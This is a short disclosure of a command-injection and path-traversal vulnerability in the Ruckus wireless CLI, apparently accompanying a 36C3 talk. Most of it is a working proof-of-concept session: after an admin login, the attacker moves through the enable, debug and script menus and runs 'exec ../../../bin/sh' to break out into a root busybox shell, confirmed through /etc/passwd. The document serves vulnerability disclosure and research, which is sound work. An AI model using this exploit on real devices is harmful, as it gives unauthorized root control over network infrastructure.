This is a command injection vulnerability via a crafted CLI command.
/bin/ruckus_cli2 is a CLI used by Ruckus for user interaction and run commands by their web interface. ruckus_cli2 has a script menu that can run limited set of stored scripts. exec command in that menu is vunrable to path traversal, and can be used to run /bin/sh in order to escape to a busybox shell.
Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.
Jail breaking Ruckus CLI using this exploit
Please login: admin
Password:
Welcome to Ruckus Unleashed Network Command Line Interface
ruckus> enable
ruckus# debug
You have all rights in this mode.
ruckus(debug)# script
ruckus(script)# exec ../../../bin/sh
Ruckus Wireless ZoneDirector -- Command Line Interface
Enter 'help' for a list of built-in commands.
ruckus$ echo $USER
admin
ruckus$ grep $USER /etc/passwd
admin:$1$-----------:0:0:root:/:/bin/sh